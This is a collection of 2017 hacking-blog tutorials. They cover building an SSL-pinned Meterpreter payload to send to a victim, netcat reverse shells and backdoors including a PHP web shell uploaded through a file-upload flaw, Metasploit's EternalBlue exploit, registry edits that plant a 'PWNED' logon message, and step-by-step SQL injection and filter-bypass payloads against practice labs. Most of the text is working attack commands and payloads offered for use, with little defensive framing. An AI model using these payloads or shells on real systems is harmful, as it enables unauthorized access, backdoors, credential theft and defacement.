Exploit Remote PC with SSL Certified Meterpreter Payload using MPM

May 19, 2017, 9:35 pm

≫ Next: Netcat Tutorials for Beginner

≪ Previous: 5 Ways to Create Dictionary for Bruteforcing

$

0

0

Through this article you can learn how an attacker would able to generate a SSL certificate for any exe or bat file payloads so that he might be able to establish a connection with host through meterpreter session.

The firewall spoof the network traffic and verifies trust certificates to establish connection itself as a trusted third party to the session between the client and the server. When the client begins with an SSL session with the server, the firewall capture the client SSL request and forwards the SSL request to the server. The server sends a certificate for the client that is captured by the firewall. If the server certificate is signed by a CA that the firewall trusts, the firewall generates a duplicate of the server certificate signed by the Forward Trust certificate and forward the certificate to the client to authenticate. 

Meterpreter_Paranoid_Mode.sh allows users to secure your staged/stageless connection for Meterpreter by having it check the certificate of the handler it is connecting to.

Open the terminal in your kali Linux and type following to download it………….

Git clone https://github.com/r00t-3xp10it/Meterpreter_Paranoid_Mode-SSL.git

Once it downloaded run the program file and follow the given below steps.

Press enter to continue

A prompt will open in which you have to choose option for building certificate from given screenshot you can read I had chosen impersonate domain.

                                               

 We start by generating a certificate in PEM format, once the certs have been created we can create a HTTP or HTTPS or EXE payload for it and give it the path of PEM format certificate to be used to validate the connection.

After that again another prompt will open in which you would be ask to mention the domain name, here the SSL certificate will generate for www.hackingarticles.in

To have the connection validated we need to tell the payload what certificate  the handler will be using by setting the path to the PEM certificatein the HANDLERSSLCERT option then we enable the checking of this certificate by setting stagerverifysslcert to true.

PEM is a widely used encoding format for security certificates. Syntax and content is defined by X.509 v3 standards for digital certificates, defined in IETF RFC 5280 specifications. The main file extensions are .pem, .crt, .ca-bundle. A PEM certificate is a base64 (ASCII) encoded block of data encapsulated between.

In next prompt choose payload category for auto building payload, from given list I chosestagless (payload.exe)

Once that payload is created we need to create a handler to receive the connection and again we use the PEM certificate so the handler can use the SHA1 hash for validation. Just like with the Payload we set the parameters HANDLERSSLCERT with the path to the PEM file and stagerverifysslcert to true.

 We can see the stage doing the validation when we recite a session back.

 Enter LHOST 192.168.0.108 (attacker’s IP)

Similarly given any random port for reverse connection from host system nd click on ok.

Enter lport 8888

Again list of payload will open from that prompt choose desire payload which will generates payload for attack.

Windows/meterpreter_reverse_http

This will configure all setting and start multi handler by lunching metasploit framework

When you move inside output folder here you will get two files; first for exe payload another for .pem certificate. Now use your effort for sharing exe file with your victim and wait for session establishment through meterpretre.

On other hand you can compare .pem certificate from other original certificate signed by CA, if you will observe given below image you can read certification details for hackingarticles.in which as similar as CA singed certificates.

Hence you can see I have successfully established the meterpreter session with victims system.

Try it by yourself!!!

---

Netcat Tutorials for Beginner

May 21, 2017, 9:57 am

≫ Next: Exploit Windows PC using EternalBlue SMB Remote Windows Kernel Pool Corruption

≪ Previous: Exploit Remote PC with SSL Certified Meterpreter Payload using MPM

$

0

0

In the field of hacking most utilized and powerful tool use by attack is popularly known as “Netcat” which is a computer networking function for analyzing from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable back-end that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool; since it can create almost any kind of connection its user could need and has a number of built-in capabilities.

Netcat is at the same time very easy and multipurpose, it's like trying to explain everything you can do with your Swiss Army knife.

For examples:-

·         Banner garbing

·         Bind shell (backdoor)

·         Chatting

·         File uploading and downloading

·         Port scanning

·         Port knocking

·         Port forwarding

·         Show webserver HTTP file contents

There are so many options inside netcat to enhance it function and effect when you will type nc –h in terminal of kali Linux. Before getting inside its working details you must aware of that here we had use two system one as attacker another as target system.  

Let’s begin

Port Knocking

Open the terminal of your kali Linux and type following command which contains target’s IP and target port number.

Nc 192.168.1.21 2222

So when the given command will be executed it will tell about hidden running service through knocking the port, from given below image you can observe that port 2222 is open for SSH.

Reverse Shell

Mainly attacker use netcat as backdoor for making unauthorized accessing target’s system, in this an attacker activates listening port (random port) when scan any vulnerable target .

nc –e /bin/bash 192.168.1.21 4444

Above command will be waiting for reverse connect from victim’s system.

In given screenshot you can see the running web site is suffering from os command injection vulnerability now use nc –e /bin/bash 192.168.1.21 4444 to establish connection between victim and attacker’s system which will allow unauthorized access by creating backdoor.

Here you can see successfully we have (attacker) access victim’s shell through netcat.

Netcat as a Backdoor

Download netcat.exe for windows and type following command

Nc.exe 192.168.1.21 4444 –e cmd.exe

From given screenshot you can perceive that attacker successfully get connected with windows client through netcat

Nc –lvp 4444

File Upload Exploitation

We will look how an attacker can exploit file upload vulnerability through netcat shell. From given image it is clear that the targeted webserver allow its client to upload an image.

For uploading we have use php-reverse-shell.php instead of image which a php backdoor. Open this web shell for editing listener IP i.e. your kali Linux IP (192.168.1.21) and then activate netcat using following command which will wait for establishing reverse connection with victim’s system.

Nc –lvp 1234

Now after uploading your php backdoor inside web server and execute the file which will connect the victim’s system from attacker machine.

Hence you can see attacker successfully made unauthorized access through netcat shell.

HTTP Request

Use Netcat to fetch web page information from a webserver.  With Netcat you can search out the full HTTP header so you can see running particular site in web server. Now type following command that make a connection to port 80.

Nc 192.168.1.11 80

OPTIONS / HTTP/1.0

From screenshot you can read the detail of http header of the targeted web site.

Port Scanning

Netcat can also scan the TPC & UDP port hence it can be use in the place of NMAP which will tell us about open and close port of the targeted IP

The following command shows target IP and port range

-z:zero-I/O mode [used for scanning]

-w:timeout for connects and final net reads

-v:-v verbose

-l:listen mode, for inbound connects

-n:numeric-only IP addresses,

From resultant image you can see open ports with running services

Chatting

Netcat is also used for the chatting from between two systems. We require putting together the Netcat to listen on a specific port on both system and connect to specific address.

Nc –lvp 5678

Nc 192.168.1.21 5678

Hi

How are you

Visit www.hackingarticles.in

File Transfer

As you know in windows we have download netcat.exe file now here I had use it for uploading a text file t.txt on targeted system through specific port.

Nc 192.168.1.21 5555 < t.txt

Now receiver can download that t.txtfile by giving similar port number that will establish connection between both systems.

Nc –lvp 5555 > /root/Desktop/t.txt

Exploit Windows PC using EternalBlue SMB Remote Windows Kernel Pool Corruption

May 23, 2017, 5:05 am

≫ Next: How to set up SQLI Lab in in Kali

≪ Previous: Netcat Tutorials for Beginner

$

0

0

This module is a port of the Equation Group ETERNALBLUE exploit, part of the FuzzBunch toolkit released by Shadow Brokers. There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later completed in srvnet!SrvNetWskReceiveComplete. This exploit, like the original may not trigger 100% of the time, and should be run continuously until triggered. It seems like the pool will get hot streaks and need a cool down period before the shells rain in again.

 Let’s start!!!

Attacker: Kali Linux

Target: window 7

Open the terminal in your Kali Linux type msfconsole to load metasploit framework.

msfconsole

Use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.8

msf exploit(ms17_010_eternalblue) >set 192.168.1.21

msf exploit(ms17_010_eternalblue) >set payload windows/x64/meterpreter/reverse_tcp

msf exploit(ms17_010_eternalblue) >exploit

From screenshot you can see we have got meterpreter session after buffer overflow exploited by overwriting SMBV1 buffer.

Meterpreter> sysinfo

How to set up SQLI Lab in in Kali

May 26, 2017, 8:05 am

≫ Next: Hack Legal Notice Caption of Remote PC

≪ Previous: Exploit Windows PC using EternalBlue SMB Remote Windows Kernel Pool Corruption

$

0

0

Hello everyone, with the joy of having new kali version somewhere few of us are having hard time in setting Dhakkan (AUDI-1) sql series lab in our kali machine.

So today we’ll be learning how to setup Dhakkan lab (one of the best labs I have seen for practicing and understanding SQL INJECTION) in our latest kali machine.

Download fromhere

Q - Why it is not as simple as it was in older version of kali?

Ans- In latest version of kali we are having PHP version 7.xxx which does not support MySQL functions because it support MySQLi functions.

MySQLi Extension (or simply known as MySQL improved or MySQLi) is a relational database driver that is used mainly in the PHP programming language. 

So we have 2 ways to set up

1-      Degrade your PHP version to 5.xx

2-      Change code of original Dhakkan lab to make it work with latest kali.

We’ll change code of labs.

Q- How I came to know that this is the issue?

Ans – When I set up my lab and browse it from my browser I saw I was unable to set up database required, See below screenshot

In the above screenshot see the URL .So now I know something is wrong in setup-db.php so I tried to run this specific file in my kali, see screenshot

So after googling the error I came to know I have to replace mysql_connect() with mysqli_connect()

After making this change when I run setup.php again I came across new error, see screenshot

So I replace mysql_query($sql)with mysqli_query($con, $sql)

($con is the connection link we made to our database) if you don’t know php don’t worry simply replace mysql_query($sql) with mysqli_query($con, $sql)

So this is how I debug the issue.

Now I am summarizing the changes that I made and you have to do to set up your lab.

Simply use Ctrl+F and replace all feature to make changes at a fast pace.

You have to make changes in index.php of ALL lessons, other php files in lessons and in all php files present in sql-connections Folder.

(Or you can contact me to get the edited lab)

S.No	Replace	Replace By
1	mysql_query($sql)	mysqli_query($con, $sql)
2	mysql_error()	mysqli_error($con)
3	mysql_fetch_array($result)	mysqli_fetch_array($result, MYSQLI_BOTH)
4	mysql_fetch_array($result1)	mysqli_fetch_array($result1, MYSQLI_BOTH)
5	mysql_connect($host,$dbuser,$dbpass)	mysqli_connect($host,$dbuser,$dbpass)
6	mysql_real_escape_string($value)	mysqli_real_escape_string($con, $value)
7	mysql_select_db($dbname, $con)	mysqli_select_db($con, $dbname)

After making the above changes copy complete sqli-labs folder in /var/www/html folder of kali

 Now open kali terminal and move to this folder using command “cd /var/www/html”

Now give permissions to sqlilabs folder using command “chmod 777 sqlilabs”

Now move to sqlilabs folder using command “cd sqlilabs” And give permissions to all files and folder in it using command “chmod 777 *”

Now your lab is ready to use you can access you lab using your browser Ip of your kali machine/sqlilabs

Click on Setup/reset Database for labs

Database set now practice and enjoy and use you skill to help organizations in securing their apps and applications from hackers. Don’t test it on sites for which you don’t have written permission to do so. It is illegal you may end up going behind the bars and ruin your career.

We are very thankful to Audi-1(aka Dhakkan) for creating such an interesting and awesome environment for us to understand and practice SQL injection.

Hack Legal Notice Caption of Remote PC

May 27, 2017, 9:54 am

≫ Next: Beginner Guide of SQL Injection (Part 1)

≪ Previous: How to set up SQLI Lab in in Kali

$

0

0

Registry key play an important role in operating system attacker makes use of legal notice registry key to send threaten message on targeted system so that once the system is boot up the user can read the message that “your system has been hacked” which appears before login screen.

Through this article we are showing how an attacker sends threaten message on logon screen to the targeted users.

Let’s start

Attacker : Kali Linux

Target: window 7

Read our previous article how to hack windows 7 and get meterpreter session of victims, inside meterpreter there are so many options for post exploit now type following command to move inside registry key of the victim’s system

Meterpreter > Reg enumkey –k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System

From screenshot you can observe that it contains 2 keys (Audit, UIPI) having 18 different values. The highlighting box is our targeted value.

i)                    Legalnoticecaption

ii)                   legalnoticetext

Now type another command for assigning the value of legalnoticecaption which is use for providing the title or heading of the given message on logon screen.

Meterpreter > Reg enumkey –k HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System –v legalnoticecaption –d “IMPORTANT MESSAGE”

From screenshot you can read our registry key is successfully set.

Now type one more command for giving warning message to the targeted system by assigning value of legalnoticetextwhich will display your message on logon screen of victim’s system.

Meterpreter > Reg enumkey –kHKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Policies\\System –v legalnoticetext –d “PWNED BY RAJ CHANDEL”

From screenshot you can read again our registry key is successfully set.

Here –k denote key; -V denote value; -d denote input data.

Now when the victim will start his system after then he will receive our message on logon screen as shown in given screenshot.

Try it yourself!!!

Beginner Guide of SQL Injection (Part 1)

May 28, 2017, 9:09 am

≫ Next: Manual SQL Injection Exploitation Step by Step

≪ Previous: Hack Legal Notice Caption of Remote PC

$

0

0

SQL injection is a technique where malicious user can inject SQL Commands into an SQL statement via web page.

An attacker could bypass authentication, access, modify and delete data within a database. In some cases, SQL Injection can even be used to execute commands on the operating system, potentially allowing an attacker to escalate to more damaging attacks inside of a network that sits behind a firewall.

List of Database

·         MySQL(Open source),

·         MSSQL,

·         MS-ACCESS,

·         Oracle,

·         Postgre SQL(open source),

·         SQLite,

Type of SQL Injection

·         In Band

·         Out of Band

·         Blind SQLI

SQLI Exploitation Technique

·         Error Based Exploitation

·         Union Based Exploitation

·         Boolean Based Exploitation

·         Time Based Delay Exploitation

·         Out of Band Exploitation

Try to Identify- where the application interact with DB

·         Authentication Page

·         Search Fields

·         Post Fields

·         Get Fields

·         HTTP Header

·         Cookie

Basic SQL Functions

SELECT	read data from the database based on searching criteria
INSERT	insert new data into the database
UPDATE	update existing data based on given criteria
DELETE	delete existing data based on given criteria
Order By	used to sort the result-set in ascending or descending order
Limit By	statement is used to retrieve records from one or more tables

SQL Injection Characters

1	Character String Indicators	‘ or “
2	Multiple-line comment	/*….*/
3	Addition, concatenate ( or space   in URL)	+
4	Single-line comment	# or - -(hyphen hyphen)
5	Double pipe (concatenate)	||
6	Wildcard attribute indicator	%
7	Local variable	@variable
8	Global variable	@@variable
9	Time delay	waitfor delay ’00:00:10’
10	String instead of number or vice versa

Database Fingerprinting

We can find out the database by analyzing the error.

S.no	Error	Type of Error
1	You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1	MySQL
2	ORA-00933: SQL command not properly ended	Oracle
3	Microsoft SQL Native Client error ‘80040e14’ Unclosed quotation mark after the character string	MS SQL

Open SQLI labs

Click on Setup/reset Database for labs

Before jumping into Dhakkan lab

Let’s first understand the basics. (How query gets executed at backend? How queries are formed? How can we break them? What exactly is sql injection?

Consider a login page where you are requested to enter username and password, when you enter username and password a query (sql query) is generated at the backend which gets executed and result is displayed to us on home page after login.

Username - Raj

Password - Chandel

So backend query will look like

SELECT * FROM table_name WHERE username=’Raj’ AND password=’Chandel’;

It is totally on the developer how he enclosed the parameter value in the sql query, he can enclose the parameter value in single quote, double quotes, double quotes with bracket etc.

So query may look like

SELECT * FROM table_name WHERE username=’Raj’ AND password=’Chandel’; 

SELECT * FROM table_name WHERE username=(’Raj’) AND password=(’Chandel’);

SELECT * FROM table_name WHERE username=”Raj” AND password=”Chandel”;

SELECT * FROM table_name WHERE username=(“Raj”) AND password=(“Chandel”);

Or in any form totally developer’s choice.

I’ll explain further using first query.

Q – What if I enter username = Raj’ ?

Ans – If I enter username=Raj’ backend query will look like

SELECT * FROM table_name WHERE username=’Raj’’ AND password=’Chandel’;

Which is syntactically wrong because of an extra quote

Q- How can we fix this broken query ? Is it possible to do so ?

Ans – Yes it is possible to fix above query even with username = Raj’

We can do so by commenting out the entire query after Raj’

So our valid query will be

SELECT * FROM table_name WHERE username=’Raj’

Which is syntactically correct

Q- How to comment out the remaining query ?

Ans – Well it depends on the database that is there at the backend.

We generally use --+ (hyphen hyphen plus), # (hash)

So if I enter username = Raj’--+

Complete query at backend will look like

SELECT * FROM table_name WHERE username=’Raj’--+’ AND password=’Chandel’;

But our database will read and execute only

SELECT * FROM table_name WHERE username=’Raj’   this much query because everything after --+ will be commented and will not be interpreted as part of the query.

This is what is called SQL INJECTION. Changing backend query using malicious input.

I don’t know if you guys are having an interesting doubt or not but I had when I was learning all these stuff, and the doubt is

According to above query formed by commenting we don’t need a valid password to login?

Yes if the developer had not taken measure to prevent sql injection and implemented the query as shown above it is possible to login using only username.

Confused? Don’t be. I’ll show you this in my upcoming articles. Now you are ready for lab, so let’s start.

Click on lesson 1 and add id as parameter in the URL

Keep on increasing id value (id=1, id=2…and so on) you will notice you will get empty screen with no username and password after id=14 which means database has 14 records.

So backend query must be something like this

SELECT * from table_name WHERE id=’1’;

                                Or

SELECT * from table_name WHERE id=(’1’);

                                Or

SELECT * from table_name WHERE id=”1”;   

At this point we don’t know how developer enclosed the value of id parameter. Let’s find out

Break the query by fuzzing, enter id=1’

Boommm!! We get the SQL Syntax error. Since this error will help us in finding the backend query and we will do SQL injection using this error, this type of SQL Injection is called Error Based SQL Injection

Now we have to analyze the error See screenshot

You can also find out this using escape character, in mysql \ (back slash) is used to escape a character.

Escaping a character means nullify the special purpose of that character. You will get clearer picture using escape character

It is clear from above screenshots that backend query

Less-1       -à         SELECT * from table_name WHERE id=’our input’

Less-2       -à         SELECT * from table_name WHERE id=our input

Less-3       -à         SELECT * from table_name WHERE id=(’our input’)

Less-4       -à         SELECT * from table_name WHERE id=(“our input”)

From now I’ll take Less-1 as base lesson to explain further

With our input as 1’ complete backend query will be

SELECT * from table_name WHERE id=’1’’ LIMIT 0,1

Which is syntactically incorrect and I explained above how to make is syntactically correct

By giving input 1’--+ (1 quote hyphen hyphen plus)

Or By giving input 1’--%20 (%20 URL encoding for space)

Or By giving input 1’%23 (%23 URL encoding for #)

http://localhost/sqlilabs/Less-1/?id=1' --%20

http://localhost/sqlilabs/Less-1/?id=1' %23 

http://localhost/sqlilabs/Less-1/?id=1' --+

Now we are able to break the query and are able to fix it syntactically.

 What Next?

Now we will try to add query between quote and --+ to get information from the database

We’ll use another SELECT query here to get information from database.

Q – Will two SELECT queries work together?

ANS – NO, we have to use UNION operator to make it work.

The UNION operator is used to combine the result-set of two or more SELECT statements.

But for UNION operator there is one precondition that Number of columns on both side of UNION operator should be same.

Since we don’t know the number of columns in the SELECT query at the backend so first we have to find the number of columns used in the SELECT query.

For this we will use ORDER BY clause.

ORDER BY clause will arrange the result set in ascending or descending order of the columns used in the query.

ORDER BY country     à  will arrange the result set in asc order of elements of column (country)

Now the problem is we even don’t know the names of the column…L

Solution to this problem is in ORDER BY clause…J

We’ll use ORDER BY 1, ORDER BY 2 etc. because ORDER BY 1 will arrange the result set in ascending order of the column present at first place in the query. (Please note, ORDER BY 1 will not arrange the result set according to first column of the table, it will arrange the result set in ascending order of the column present at first place in the query).

Let’s try now

http://localhost/sqlilabs/Less-1/?id=-1' order by 1 --+    No Error

http://localhost/sqlilabs/Less-1/?id=-1' order by 2 --+    No Error

http://localhost/sqlilabs/Less-1/?id=-1' order by 4 --+    Error

This shows that there is no 4^thcolumn in the query. So now we know there are 3 columns in the query at the backend.

So now we can use UNION operator with another SELECT query.

http://localhost/sqlilabs/Less-1/?id=1' union select 1,2,3 --+

See there is no error but we are getting result set of first query, to get the result of second select query on the screen we have to make the result set of first query as EMPTY. This we can achieve by providing the id that does not exist. We can provide negative id or id >14 because in the starting of article we figured out that there are 14 ids in the database.

http://localhost/sqlilabs/Less-1/?id=-1' union select 1,2,3 --+

Or

http://localhost/sqlilabs/Less-1/?id=15' union select 1,2,3 --+

This shows we are getting values of column 2 and column 3 as output. So we’ll use these two columns to extract information about database and from database.

http://localhost/sqlilabs/Less-1/?id=1' union select 1,2,version() --+

This will give the version of database used at the backend

http://localhost/sqlilabs/Less-1/?id=1' union select 1,database(),version() --+

This will give the database we are using and current version of database used at the backend

Since we are using UNION operator to perform SQL INJECTION, this type of injection is called UNION BASED SQL INJECTION ( a type of ERROR BASED SQL INJECTION)

Union Based Sql Injection

Variable/function	Output
user()	Current User
database()	Current Database
version()	Database Version
schema()	Current Database
UUID()	System UUID Key
current_user()	Current User
system_user()	Current System User
session_user()	Session User
@@hostname	Current Hostname
@@tmpdir	Temporary Directory
@@datadir	Data Directory
@@version	Version of Database
@@basedir	Base Directory
@@GLOBAL.have_symlink	Check if symlink is Enabled or Disabled
@@GLOBAL.have_ssl	Check if it SSL is available

I think this is enough for this article, we’ll continue from here in my next article where we’ll learn how to dump database using queries the same way we used in this article. In my next article I’ll be using terms like information_schema, table_schema, limit, outfile, it will be easier for you to understand if you know there terms, so read about them and practice what we have learned in this article.

Manual SQL Injection Exploitation Step by Step

May 29, 2017, 9:56 am

≫ Next: How to Bypass Filter in SQL Injection Manually

≪ Previous: Beginner Guide of SQL Injection (Part 1)

$

0

0

This article is based on our previousarticle where you have learned different techniques to perform SQL injection manually using dhakkan. Today we are again performing SQL injection manually on a live website “vulnweb.com” in order to reduce your stress of installing setup of dhakkan.

We are going to apply same concept and techniques as performed in Dhakkan on different the platform

 Let’s begin!

Open given below targeted URL in the browser

http://testphp.vulnweb.com/artist.php?artist=1So here we are going test SQL injection for “id=1

Now use error base technique by adding an apostrophe (‘) symbol at the end of input which will try to break the query.

http://testphp.vulnweb.com/artist.php?artist=1’

In the given screenshot you can see we have got error message which means the running site is infected by SQL injection.

Now using ORDER BY keyword to sort the records in ascending or descending order for id=1

http://testphp.vulnweb.com/artist.php?artist=1 order by 1

Similarly repeating for order 2, 3 and so on one by one

http://testphp.vulnweb.com/artist.php?artist=1 order by 2

http://testphp.vulnweb.com/artist.php?artist=1 order by 4

From screenshot you can see we have got error at order by 4 which means it consist only three records.

Let’s penetrate more inside using union base injection to select statement from different table.

http://testphp.vulnweb.com/artist.php?artist=1 union select 1,2,3

 From screenshot you can see it is show result for only one table not for others.

Now try to pass wrong input into database through URL by replacing artist=1 from artist=-1 as given below:

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,2,3

Hence you can see now it is showing the result for remaining two tables also.

Use next query to fetch the name of database

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,database(),3

From screen shot you can read the database name acuart

Next query will extract current username as well as version of database system

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,version(),cuurent_user()

Here we have retrieve 5.1.73 0ubuntu0 10.04.1 as version and acuart@localhostas current user

Through next query we will try to fetch table name inside the database

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1

from screenshot you can name of first table is carts.

Similarly repeat the same query for another table with slight change

http://testphp.vulnweb.com/artist.php?artist=-1union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1

We got table 2: categ

http://testphp.vulnweb.com/artist.php?artist=-1union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 3,1

We got table 3:featured

Similarly repeat same query for table 4, 5, 6, and 7 with making slight changes in LIMIT.

http://testphp.vulnweb.com/artist.php?artist=-1union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 7,1

We got table 7:users

http://testphp.vulnweb.com/artist.php?artist=-1union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 8,1

Since we didn’t get anything when limit is set 8, 1 hence their might be 7 tables only inside the database.

concat function is use for concatenation of two or more string into single string.

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

From screen you can see through concat function we have successfully retrieve all table name inside the

database.

Table1: artist

Table2: Carts

Table3: Featured

Table4: Guestbook

Table5: Pictures

Table6: Product

Table7: users

May be we can get some important data from userstable, so let’s penetrate more inside.  Again Use concat function for table users for retrieving its entire column names.

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(column_name),3 from users

Awesome!!  We successfully retrieve all eight column names from inside the table users.

Then I have choose only four column i.e. uname, pass,email and cc for further enumeration.

Use concat function for selecting uname from table users by executing following query through URL

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(uname),3 from users

From screenshot you can read uname: test

Use concat function for selecting pass from table users by executing following query through URL

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(pass),3 from users

From screenshot you can read pass: test

Use concat function for selecting cc(credit card) from table users by executing following query through URL

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(cc),3 from users

From screenshot you can read cc: 1234-5678-2300-9000

Use concat function for selecting email from table users by executing following query through URL

http://testphp.vulnweb.com/artist.php?artist=-1 union select 1,group_concat(email),3 from users

From screenshot you can read email: jitendra@panalinks.com

 Enjoy hacking!!

How to Bypass Filter in SQL Injection Manually

June 3, 2017, 10:23 am

≫ Next: Hack the Super Mario (CTF Challenge)

≪ Previous: Manual SQL Injection Exploitation Step by Step

$

0

0

In previous article you have learned the basic concepts of SQL injection but in some scenarios you will find that your basic knowledge and tricks will fail. The reason behind that is the protection that developer had applied to prevent SQL injection, sometimes developer use filters to strip out few characters and OPERATORS from the user input before adding it to the query for SQL statement to prevent SQL Injection. Today’s article will help you to face such situations and will tell you how to bypass such filters. Here again we’ll be using DHAKKAN SQLI labs for practice.

Let’s start!!

LESSION 25

In Lab 25 ORand ANDfunction are Blockedhere we will try to bypass sql filter using their substitute.

function blacklist($id)

$id= preg_replace('/or/i',"", $id);                              //strip out OR (non case sensitive)

$id= preg_replace('/AND/i',"", $id);                         //Strip out AND (non case sensitive)

Since alphabetic word OR, AND are blacklisted, hence if we use AND 1=1 and OR 1=1 there would be no output therefore I had use %26%26 inside the query.

 Following are replacement for AND and OR

AND :   &&   %26%26 

OR  :  || 

Open the browser and type following SQL query  in URL

http://localhost:81/sqli/Less-25/?id=1' %26%26 1=1 --+

From screenshot you can see we have successfully fixed the query for AND (&&) into URL encode as %26%26. Even when AND operator was filtered out.

Once the concept is clear to bypass AND filter later we need to alter the               SQL statement for retrieving database information.

http://localhost:81//sqli/Less-25/?id=-1' union select 1,2,3 %26%26 1=1 --+

Type following query to retrieve database name using union injection

http://localhost:81/sqli/Less-25/?id=-1' union select 1,database(),3 %26%26 1=1 --+

hence you can see we have successfully get securtiy as database name as result.

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %26%26 1=1 --+

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %26%26 1=1 --+

Hence you can see it contains 4 columns inside it.

C1: id

C2: username

C3: password

At last execute following query to read all username inside the table users from inside its column.

http://localhost:81/sqli/Less-25/?id=-1' union select 1,group_concat(username),3 from users --+

From screenshot you can read the fetched data.

Hence in lesson 25 we have learn how to bypass AND, OR filter for retrieving information inside the database.

LESSION 26

You will find lab 26 more challenging because here space,Comments,OR and AND are Blocked so now we will try to bypass sql filter using their substitute.

Following are function blacklist($id)

preg_replace('/or/i',"", $id);                                       //strip out OR (non case sensitive)

$id= preg_replace('/and/i',"", $id);                          //Strip out AND (non case sensitive)

$id= preg_replace('/[\/\*]/',"", $id);                       //strip out /*

$id= preg_replace('/[--]/',"", $id);                            //Strip out --

$id= preg_replace('/[#]/',"", $id);                             //Strip out #

$id= preg_replace('/[\s]/',"", $id);                            //Strip out spaces

$id= preg_replace('/[\/\\\\]/',"", $id);    //Strip out slashes

This lab has more filters as compared to lab 25  because here space,Comments are also Blocked. Now execute following query In URL .

http://localhost:81/sqli/Less-26/?id=1'%a0%26%26'1=1

From screenshot you can see we have successfully fixed the query for SPACE into URL encode as %a0

Blanks = ('%09', '%0A', '%0C', '%0D', '%0B''%a0')

Once the concept is clear to bypass AND, OR and SPACE filter later we need to alter the                SQL statement for retrieving database information.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,2,3%a0%26%26'1=1

Type following query to retrieve database name using union injection.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,database(),3%a0%26%26'1=1

Hence you can see we have successfully get securtiy as database name as result

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema=database()%a0%26%26'1=1

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0%26%26'1=1

Hence you can see columns inside it.

C1: id

C2: username

C3: password

At last execute following query to read all username inside the table users from inside its column.

From screenshot you can read the fetched data.

http://localhost:81/sqli/Less-26/?id=0'%a0union%a0select%a01,group_concat(username),3%a0from%a0users%a0where%a01%26%26%a0'1

Hence in lesson 26 we have learned how to bypass AND, OR, SPACE AND COMMENT filter for retrieving information from the database.

LESSON 27

You will find this lab even more challenging because here UNION/union, SELECT/select, SPACE and Comments are Blocked so now we will try to bypass sql filter using their substitute.

Following are function blacklist($id)

$id= preg_replace('/[\/\*]/',"", $id);                       //strip out /*

$id= preg_replace('/[--]/',"", $id);                            //Strip out --.

$id= preg_replace('/[#]/',"", $id);                                             //Strip out #.

$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.

$id= preg_replace('/select/m',"", $id);       //Strip out spaces.

$id= preg_replace('/[ +]/',"", $id);                //Strip out spaces.

$id= preg_replace('/union/s',"", $id);         //Strip out union

$id= preg_replace('/select/s',"", $id);         //Strip out select

$id= preg_replace('/UNION/s',"", $id);      //Strip out UNION

$id= preg_replace('/SELECT/s',"", $id);       //Strip out SELECT

$id= preg_replace('/Union/s',"", $id);         //Strip out Union

$id= preg_replace('/Select/s',"", $id);         //Strip out select

This lab has more filters in addtion to lab 26  because here union, select, space andComments are also Blocked. Now execute following query In URL .

http://localhost:81/sqli/Less-27/?id=1' AND'1=1

Once the concept is clear to bypass UNION/union, SELECT/select and SPACE filter later we need to alter the SQL statement for retrieving database information.

http://localhost:81/sqli/Less-27/?id=1'%a0UnIon%a0SeLect%a01,2,3%a0AND'1=1

 In screenshot you can see I have use union as UnIon and select as SeLect in query to bypass the filter.

Now Type following query to retrieve database name using union injection.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,database(),3%a0AND'1=1

Hence you can see we have successfully get securtiy as database name as result

Next query will provide entire table names saved inside the database.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema=database()%a0AND'1=1

From screenshot you can read the following table names:

T1: emails

T2: referers

T3: uagents

T4: users

Now we’ll try to find out column names of users table using following query.

http://localhost:81/sqli/Less-27/?id=0'%a0UnIon%a0SeLect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0AND'1=1

Hence you can see columns inside it.

C1: id

C2: username

C3: password

